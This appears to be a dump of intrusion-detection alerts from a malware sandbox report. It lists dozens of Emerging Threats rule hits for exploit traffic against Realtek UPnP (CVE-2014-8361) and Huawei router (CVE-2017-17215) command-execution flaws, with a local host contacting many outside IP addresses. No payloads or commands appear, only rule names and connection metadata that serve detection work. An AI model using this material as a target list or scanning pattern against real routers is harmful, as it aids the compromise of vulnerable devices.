                                                07/20/24-23:05:46.070077TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615480252869192.168.2.14147.148.71.168
                                                07/20/24-23:05:39.181981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5905652869192.168.2.1461.50.146.33
                                                07/20/24-23:07:03.190387TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027852869192.168.2.1489.185.47.122
                                                07/20/24-23:05:39.832778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613391252869192.168.2.1495.244.78.147
                                                07/20/24-23:06:05.614115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288652869192.168.2.14117.29.110.218
                                                07/20/24-23:06:13.525153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5192852869192.168.2.14202.180.182.96
                                                07/20/24-23:05:33.855567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478237215192.168.2.14110.124.171.180
                                                07/20/24-23:05:48.762153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575437215192.168.2.14126.151.245.189
                                                07/20/24-23:06:08.268005TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5320652869192.168.2.148.57.21.242
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884637215192.168.2.1425.142.145.178
                                                07/20/24-23:05:45.414465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513237215192.168.2.1441.12.186.59
                                                07/20/24-23:05:45.412130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894037215192.168.2.14197.36.12.42
                                                07/20/24-23:05:45.414465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247437215192.168.2.14198.41.203.180
                                                07/20/24-23:06:01.160884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3446852869192.168.2.1437.78.193.168
                                                07/20/24-23:06:09.682183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615350652869192.168.2.14175.89.209.205
                                                07/20/24-23:06:05.271056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3708452869192.168.2.1436.65.172.137
                                                07/20/24-23:05:35.717999TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614591452869192.168.2.14131.178.64.107
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717437215192.168.2.14197.118.220.163
                                                07/20/24-23:06:06.402808TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615553052869192.168.2.14100.216.158.55
                                                07/20/24-23:06:03.095402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3985452869192.168.2.14133.34.160.194
                                                07/20/24-23:06:01.173503TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614237052869192.168.2.14135.229.90.34
                                                07/20/24-23:06:00.417227TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23478852869192.168.2.14114.51.118.233
                                                07/20/24-23:05:35.501401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5596652869192.168.2.1460.73.199.117
                                                07/20/24-23:05:57.187455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615966252869192.168.2.14179.139.227.149
                                                07/20/24-23:06:02.500189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24084852869192.168.2.1431.89.98.146
                                                07/20/24-23:06:09.682183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4325852869192.168.2.14101.119.132.162
                                                07/20/24-23:06:12.687393TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24209052869192.168.2.14201.80.203.210
                                                07/20/24-23:06:17.536920TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615322652869192.168.2.14100.0.21.245
                                                07/20/24-23:06:02.417792TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23339652869192.168.2.14165.198.98.63
                                                07/20/24-23:06:10.391415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5601252869192.168.2.14149.73.181.225
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985637215192.168.2.1418.9.43.125
                                                07/20/24-23:06:07.422962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544437215192.168.2.14151.116.92.99
                                                07/20/24-23:05:59.445692TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4370852869192.168.2.1464.167.73.71
                                                07/20/24-23:06:27.685490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5686852869192.168.2.1471.126.238.212
                                                07/20/24-23:06:02.766400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5829252869192.168.2.14132.45.253.181
                                                07/20/24-23:07:10.361471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3795252869192.168.2.1449.169.205.181
                                                07/20/24-23:06:08.320378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615500652869192.168.2.1413.171.239.70
                                                07/20/24-23:05:52.514709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3358452869192.168.2.14197.130.252.234
                                                07/20/24-23:06:26.096786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5757652869192.168.2.14115.192.236.13
                                                07/20/24-23:07:21.395373TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23782652869192.168.2.14147.248.169.35
                                                07/20/24-23:06:16.552344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637437215192.168.2.14197.213.170.176
                                                07/20/24-23:05:47.105578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937837215192.168.2.1441.254.62.150
                                                07/20/24-23:05:59.324561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25402452869192.168.2.1459.108.150.126
                                                07/20/24-23:05:58.226234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25767652869192.168.2.14197.203.241.220
                                                07/20/24-23:06:01.856452TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614602052869192.168.2.1492.24.43.126
                                                07/20/24-23:06:20.610603TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23630452869192.168.2.14120.51.213.234
                                                07/20/24-23:05:50.600216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777237215192.168.2.14157.234.113.1
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829037215192.168.2.1492.253.115.109
                                                07/20/24-23:06:13.006675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5758452869192.168.2.1464.26.80.76
                                                07/20/24-23:06:45.141052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764837215192.168.2.14197.250.171.230
                                                07/20/24-23:07:06.898582TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613689252869192.168.2.14217.234.142.206
                                                07/20/24-23:05:39.672304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037837215192.168.2.1441.139.18.5
                                                07/20/24-23:05:37.899491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5377852869192.168.2.14106.223.167.59
                                                07/20/24-23:06:11.280682TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3682452869192.168.2.14133.131.6.20
                                                07/20/24-23:05:40.471609TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23728452869192.168.2.14121.139.236.213
                                                07/20/24-23:05:40.347403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23683652869192.168.2.14193.96.47.59
                                                07/20/24-23:06:40.117305TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5040852869192.168.2.14103.128.148.32
                                                07/20/24-23:07:05.182532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615246452869192.168.2.14118.250.58.5
                                                07/20/24-23:05:36.076308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433852869192.168.2.1441.152.208.190
                                                07/20/24-23:06:07.248816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4228452869192.168.2.1417.191.215.191
                                                07/20/24-23:06:14.583817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5066652869192.168.2.1427.157.237.238
                                                07/20/24-23:06:14.305121TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613898252869192.168.2.1496.157.22.210
                                                07/20/24-23:06:51.240850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614064452869192.168.2.14118.110.83.106
                                                07/20/24-23:06:09.698680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614689852869192.168.2.14103.38.73.32
                                                07/20/24-23:06:15.063003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3868052869192.168.2.1460.32.244.232
                                                07/20/24-23:05:58.178719TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614099052869192.168.2.14108.204.101.233
                                                07/20/24-23:05:57.161619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3459052869192.168.2.14166.179.95.6
                                                07/20/24-23:05:50.557200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123437215192.168.2.14157.181.108.35
                                                07/20/24-23:06:21.974244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613989852869192.168.2.14103.65.167.145
                                                07/20/24-23:05:38.951134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084837215192.168.2.14157.186.3.226
                                                07/20/24-23:06:03.045663TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614569852869192.168.2.1459.99.219.79
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369237215192.168.2.14157.98.9.197
                                                07/20/24-23:05:40.451363TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24022052869192.168.2.14206.220.79.127
                                                07/20/24-23:06:38.422006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072052869192.168.2.14146.85.252.85
                                                07/20/24-23:06:02.093469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4455652869192.168.2.149.99.224.142
                                                07/20/24-23:06:14.305121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6095052869192.168.2.14190.160.217.156
                                                07/20/24-23:05:57.214918TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5999852869192.168.2.1486.91.56.112
                                                07/20/24-23:05:42.237871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5962637215192.168.2.14197.62.41.222
                                                07/20/24-23:05:46.088778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905837215192.168.2.14157.235.233.243
                                                07/20/24-23:06:02.402123TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25257652869192.168.2.1447.131.236.250
                                                07/20/24-23:05:40.359038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5528052869192.168.2.1436.253.231.32
                                                07/20/24-23:06:53.169467TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23450652869192.168.2.1412.222.33.202
                                                07/20/24-23:05:38.971654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719437215192.168.2.14197.195.33.211
                                                07/20/24-23:05:48.821008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954837215192.168.2.1441.191.148.147
                                                07/20/24-23:06:05.658836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613637252869192.168.2.14131.148.44.75
                                                07/20/24-23:06:09.742007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5652452869192.168.2.14124.231.89.13
                                                07/20/24-23:06:15.061851TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613576452869192.168.2.1412.193.71.48
                                                07/20/24-23:05:37.520621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5138052869192.168.2.1417.150.249.106
                                                07/20/24-23:05:36.323712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947237215192.168.2.1444.253.113.189
                                                07/20/24-23:05:45.106264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3557452869192.168.2.14167.216.237.21
                                                07/20/24-23:05:59.267873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4959252869192.168.2.14164.94.110.129
                                                07/20/24-23:06:19.865859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615344252869192.168.2.14112.35.155.8
                                                07/20/24-23:05:40.392392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4876452869192.168.2.1417.18.17.141
                                                07/20/24-23:06:07.406980TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24204852869192.168.2.1481.135.180.241
                                                07/20/24-23:05:52.544972TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25733052869192.168.2.1414.188.62.21
                                                07/20/24-23:06:29.745087TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25664252869192.168.2.1412.167.125.66
                                                07/20/24-23:05:35.812828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615995652869192.168.2.14132.39.168.140
                                                07/20/24-23:05:56.285994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105637215192.168.2.14197.106.37.199
                                                07/20/24-23:05:57.809291TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5212252869192.168.2.14159.109.243.206
                                                07/20/24-23:05:57.148116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5219052869192.168.2.14195.123.119.195
                                                07/20/24-23:06:23.081522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3647852869192.168.2.142.111.252.152
                                                07/20/24-23:05:46.759276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6064452869192.168.2.14196.214.249.37
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688237215192.168.2.14197.26.201.125
                                                07/20/24-23:05:47.120793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435637215192.168.2.14197.228.20.160
                                                07/20/24-23:05:58.965682TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26011052869192.168.2.14100.53.98.16
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272837215192.168.2.14157.196.176.114
                                                07/20/24-23:05:52.589589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24509652869192.168.2.14165.53.50.40
                                                07/20/24-23:06:23.270832TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614747852869192.168.2.14162.101.84.116
                                                07/20/24-23:06:00.208694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4361852869192.168.2.14217.27.23.121
                                                07/20/24-23:05:35.601714TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615101852869192.168.2.14132.253.188.42
                                                07/20/24-23:05:50.595920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407037215192.168.2.14189.255.135.112
                                                07/20/24-23:05:58.102253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613792052869192.168.2.1453.49.234.47
                                                07/20/24-23:06:54.482380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4445452869192.168.2.14141.141.50.24
                                                07/20/24-23:06:17.614211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3495452869192.168.2.141.239.54.173
                                                07/20/24-23:05:39.397958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613429852869192.168.2.14126.55.207.112
                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872037215192.168.2.14157.12.47.227
                                                07/20/24-23:05:52.516035TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24694452869192.168.2.1483.112.33.152
                                                07/20/24-23:05:59.136809TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613927452869192.168.2.1489.185.47.122
                                                07/20/24-23:05:37.454499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4814452869192.168.2.14134.214.175.73
                                                07/20/24-23:05:36.327719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233037215192.168.2.14197.78.71.227
                                                07/20/24-23:05:36.526908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168837215192.168.2.1441.208.110.248
                                                07/20/24-23:05:33.857159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5195837215192.168.2.14211.147.140.76
                                                07/20/24-23:06:04.510666TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24498052869192.168.2.14200.224.84.86
                                                07/20/24-23:05:39.048997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508037215192.168.2.14157.246.104.242
                                                07/20/24-23:06:00.781631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532252869192.168.2.1494.62.92.125
                                                07/20/24-23:05:37.449942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25930652869192.168.2.1449.40.97.50
                                                07/20/24-23:05:58.898489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615789052869192.168.2.14119.8.55.247
                                                07/20/24-23:05:59.457721TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23611452869192.168.2.14117.112.92.46
                                                07/20/24-23:06:06.291744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5971852869192.168.2.1438.86.172.217
                                                07/20/24-23:05:45.435097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926037215192.168.2.14157.118.90.71
                                                07/20/24-23:05:45.447173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382437215192.168.2.14157.64.114.224
                                                07/20/24-23:06:09.668423TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23558852869192.168.2.1453.149.94.192
                                                07/20/24-23:06:12.532321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4079252869192.168.2.14104.173.87.251
                                                07/20/24-23:05:40.439699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3497452869192.168.2.14193.5.42.88
                                                07/20/24-23:05:40.347403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25336052869192.168.2.1486.28.56.254
                                                07/20/24-23:06:02.701650TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4396652869192.168.2.14123.2.215.104
                                                07/20/24-23:06:13.646796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3282852869192.168.2.1459.102.173.92
                                                07/20/24-23:06:01.176055TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614569252869192.168.2.14103.249.11.195
                                                07/20/24-23:06:23.241818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5978652869192.168.2.1484.20.95.181
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441837215192.168.2.14157.180.177.138
                                                07/20/24-23:05:56.421312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852837215192.168.2.14157.180.228.137
                                                07/20/24-23:05:57.571973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25961252869192.168.2.14106.97.250.162
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159437215192.168.2.1441.57.89.122
                                                07/20/24-23:07:25.723282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4453852869192.168.2.14170.22.45.167
                                                07/20/24-23:06:19.939162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389852869192.168.2.14112.247.29.53
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294837215192.168.2.14186.106.76.92
                                                07/20/24-23:06:08.994885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798237215192.168.2.14157.237.188.52
                                                07/20/24-23:06:19.586892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5402452869192.168.2.1423.110.47.132
                                                07/20/24-23:06:27.648191TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613371052869192.168.2.1499.160.107.32
                                                07/20/24-23:06:20.768887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5814852869192.168.2.14149.227.126.225
                                                07/20/24-23:06:35.384402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614387852869192.168.2.14123.248.173.31
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670637215192.168.2.14197.180.186.174
                                                07/20/24-23:05:57.159827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615422652869192.168.2.14102.163.53.206
                                                07/20/24-23:05:45.694473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6096052869192.168.2.1472.109.105.60
                                                07/20/24-23:05:58.262546TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615508652869192.168.2.1479.99.137.178
                                                07/20/24-23:05:58.821284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3514052869192.168.2.14209.194.5.31
                                                07/20/24-23:06:14.535864TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615183252869192.168.2.14192.125.129.180
                                                07/20/24-23:05:59.400253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614772452869192.168.2.1439.191.83.40
                                                07/20/24-23:05:33.857328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.14141.199.59.173
                                                07/20/24-23:06:14.723902TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613291652869192.168.2.1448.7.10.100
                                                07/20/24-23:05:38.080292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5722052869192.168.2.1445.124.106.123
                                                07/20/24-23:05:36.431582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4453452869192.168.2.1423.55.138.59
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758437215192.168.2.14197.195.110.143
                                                07/20/24-23:05:58.855356TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4257252869192.168.2.14104.109.248.86
                                                07/20/24-23:06:13.684507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761052869192.168.2.14206.146.161.64
                                                07/20/24-23:05:40.347403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4755652869192.168.2.14153.164.18.4
                                                07/20/24-23:05:59.081357TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5289252869192.168.2.14217.8.249.6
                                                07/20/24-23:05:47.125782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392237215192.168.2.1480.252.95.7
                                                07/20/24-23:05:59.400253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4497252869192.168.2.14176.19.123.19
                                                07/20/24-23:05:59.787018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3623052869192.168.2.1460.161.200.238
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.1441.51.127.171
                                                07/20/24-23:05:59.984660TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5187252869192.168.2.1472.144.78.222
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769237215192.168.2.14157.193.186.104
                                                07/20/24-23:05:56.896492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614034652869192.168.2.14101.18.135.140
                                                07/20/24-23:06:13.620376TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613473852869192.168.2.14146.93.233.79
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964237215192.168.2.14197.174.98.141
                                                07/20/24-23:05:58.893722TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24304452869192.168.2.1467.24.164.252
